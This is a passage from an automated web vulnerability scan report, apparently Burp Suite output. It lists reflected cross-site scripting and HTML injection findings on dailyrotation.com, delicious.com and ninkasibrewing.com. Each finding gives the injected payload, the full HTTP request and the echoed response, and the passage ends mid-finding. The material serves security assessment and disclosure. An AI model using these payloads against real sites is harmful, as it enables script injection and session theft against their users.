Date: Sun, 21 Nov 2010 17:13:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 88293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/5ba68"-alert(1)-"56e962f9ff9";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.143. http://www.dailyrotation.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dailyrotation.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7d53'><script>alert(1)</script>ea2cc056bdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php/a7d53'><script>alert(1)</script>ea2cc056bdc HTTP/1.1
Host: www.dailyrotation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 18:11:57 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=8fe5413863d004cd4dffc69e9523aac6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 208601


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>


<TITLE>DAILY ROTATION</TITLE>
<META NAME="description" CONTENT="DAI
...[SNIP]...
<a class='delete_button' href='/index.php/a7d53'><script>alert(1)</script>ea2cc056bdc?delete_feed=1&id=1000042'>
...[SNIP]...

1.144. http://www.dailyrotation.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dailyrotation.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5acc8"><script>alert(1)</script>328385cd11c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php/5acc8"><script>alert(1)</script>328385cd11c HTTP/1.1
Host: www.dailyrotation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 18:11:53 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=c8c0a760cd8f98cd3b42b976fc403223; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 212394


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>


<TITLE>DAILY ROTATION</TITLE>
<META NAME="description" CONTENT="DAI
...[SNIP]...
<form name="options" action="/index.php/5acc8"><script>alert(1)</script>328385cd11c" method="POST">
...[SNIP]...

1.145. http://www.delicious.com/post [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.delicious.com
Path:   /post

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e8b"><script>alert(1)</script>3501892d15d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /poste3e8b"><script>alert(1)</script>3501892d15d HTTP/1.1
Host: www.delicious.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:57:35 GMT
Set-Cookie: BX=bk4eee96eincf&b=3&s=p9; expires=Tue, 21-Nov-2012 20:00:00 GMT; path=/; domain=.delicious.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: searchTray=deleted; expires=Sat, 21-Nov-2009 17:57:34 GMT; path=/; domain=.delicious.com
Pragma: no-cache
Cache-Control: no-store, must-revalidate, no-cache, private, max-age=0, post-check=0, pre-check=0
X-Xss-Protection: 0
Expires: Sun, 1 Jan 2006 01:00:00 GMT
X-Ua-Compatible: IE=7
Set-Cookie: delicious_us_production=aOBwa0.OcQ6pvK8qi9rZPTho35F3kIgcrHKdNprAMBBeH0VAWeQUPcYK5diyA_KPmnbHcmDB7qOeHc.Y1SF_.JjJp3zW5idQnvtldXV5sLdQCx8VnSgf1vH12i8Il3UjL17Mnbx3uUKpBlJQUkWXoS.sPQWto5Rkd61EA50IQniwMKL7iRakgzOAS8TpWfy2QEjhf3gNQq0Y199oHJMHFSnHGHDGYsZupZ.D.tshfMRVzxsd.xDL_9RxZp.CbZ_jt9LHs0Z8bFlSqjXnVzKnTH1uGBgBRw1O6Fdti2MQqAsVOLsF0h_kxrpSOG_AaqnSSjAPe38pjVo-; expires=Mon, 21-Nov-2011 17:57:35 GMT; path=/; domain=.delicious.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Connection: close
Server: YTS/1.17.21

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta h
...[SNIP]...
<a href="/poste3e8b"><script>alert(1)</script>3501892d15d?settagview=cloud">
...[SNIP]...

1.146. http://www.delicious.com/robots.txt [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.delicious.com
Path:   /robots.txt

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe581"><script>alert(1)</script>c005148dcf7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /robots.txtfe581"><script>alert(1)</script>c005148dcf7 HTTP/1.1
Host: www.delicious.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:57:32 GMT
Set-Cookie: BX=e7fd4k16eincc&b=3&s=o5; expires=Tue, 21-Nov-2012 20:00:00 GMT; path=/; domain=.delicious.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: searchTray=deleted; expires=Sat, 21-Nov-2009 17:57:31 GMT; path=/; domain=.delicious.com
Pragma: no-cache
Cache-Control: no-store, must-revalidate, no-cache, private, max-age=0, post-check=0, pre-check=0
X-Xss-Protection: 0
Expires: Sun, 1 Jan 2006 01:00:00 GMT
X-Ua-Compatible: IE=7
Set-Cookie: delicious_us_production=ckLtZtuNcQ42hIKZOkVaFKp1JLyzleBmiYSELxBCLupLYTAmo._oO8G9g2QNgTa7Nq8.YwWIKx9zQzypWUrdoMHsBt0YAkTsLhd67VFA93GJkBxj1Jtyb0iZSqWUABH1gRu6FXSTdIcBRVWJPj.E8WbkZPnKl0_S3.1lg1VxI9xpje0Gm4ce912BwZmgo3zQmkCG.SaOQv5_A3xNAWK42K38CN_5CfI0FhWlI2bp1wN.mO8DjVwhqQf90d_CHS5Yvfol9oB_f6ZEYCdxrjdbFil1Gz5E3mZn7LmhiRoL43vjABOUMY0Rc3ZNvdGrErptGcanCtfjnuM-; expires=Mon, 21-Nov-2011 17:57:32 GMT; path=/; domain=.delicious.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Connection: close
Server: YTS/1.17.21

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta h
...[SNIP]...
<a href="/robots.txtfe581"><script>alert(1)</script>c005148dcf7?settagview=cloud">
...[SNIP]...

1.147. http://www.ninkasibrewing.com/beer_finder/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cef6"><a>d1a9d545bb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder7cef6"><a>d1a9d545bb1/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder7cef6"><a>d1a9d545bb1_page" class="beer_finder7cef6">
...[SNIP]...

1.148. http://www.ninkasibrewing.com/beer_finder/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19329"><a>8b6dab35f14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder19329"><a>8b6dab35f14/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder19329"><a>8b6dab35f14_page" class="beer_finder19329">
...[SNIP]...

1.149. http://www.ninkasibrewing.com/beer_finder/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b114"><a>2a2a038a928 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder6b114"><a>2a2a038a928/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder6b114"><a>2a2a038a928_page" class="beer_finder6b114">
...[SNIP]...

1.150. http://www.ninkasibrewing.com/beer_finder/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 536f7"><a>2e8ea686748 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder536f7"><a>2e8ea686748/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder536f7"><a>2e8ea686748_page" class="beer_finder536f7">
...[SNIP]...

1.151. http://www.ninkasibrewing.com/beer_finder/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4b6f"><a>5c83f0838cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finderf4b6f"><a>5c83f0838cb/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finderf4b6f"><a>5c83f0838cb_page" class="beer_finderf4b6f">
...[SNIP]...

1.152. http://www.ninkasibrewing.com/beer_finder/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85e44"><a>7d1f97cbdd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder85e44"><a>7d1f97cbdd2/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder85e44"><a>7d1f97cbdd2_page" class="beer_finder85e44">
...[SNIP]...

1.153. http://www.ninkasibrewing.com/beer_finder/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 392d4"><a>7acca5121c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder392d4"><a>7acca5121c2/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder392d4"><a>7acca5121c2_page" class="beer_finder392d4">
...[SNIP]...

1.154. http://www.ninkasibrewing.com/beers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8d2"><a>16a8c03f2fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers4e8d2"><a>16a8c03f2fd/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.wired.com/playbook/?intcid=gnav

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Set-Cookie: PHPSESSID=rl6vcsjo3iil8biltj6mc4n0r2; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beers4e8d2"><a>16a8c03f2fd_page" class="beers4e8d2">
...[SNIP]...

1.155. http://www.ninkasibrewing.com/beers/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41638"><a>88fb649091c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers41638"><a>88fb649091c/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beers41638"><a>88fb649091c_page" class="beers41638">
...[SNIP]...

1.156. http://www.ninkasibrewing.com/beers/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 132d9"><a>11e6d305782 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers132d9"><a>11e6d305782/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 21 Nov 2010 21:48:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beers132d9"><a>11e6d305782_page" class="beers132d9">
...[SNIP]...

1.157. http://www.ninkasibrewing.com/beers/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0387"><a>286a56ca007 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beersf0387"><a>286a56ca007/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beersf0387"><a>286a56ca007_page" class="beersf0387">
...[SNIP]...

1.158. http://www.ninkasibrewing.com/beers/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dad3"><a>57b154d7fd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers3dad3"><a>57b154d7fd1/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beers3dad3"><a>57b154d7fd1_page" class="beers3dad3">
...[SNIP]...

1.159. http://www.ninkasibrewing.com/beers/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed707"><a>9aff3285dbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

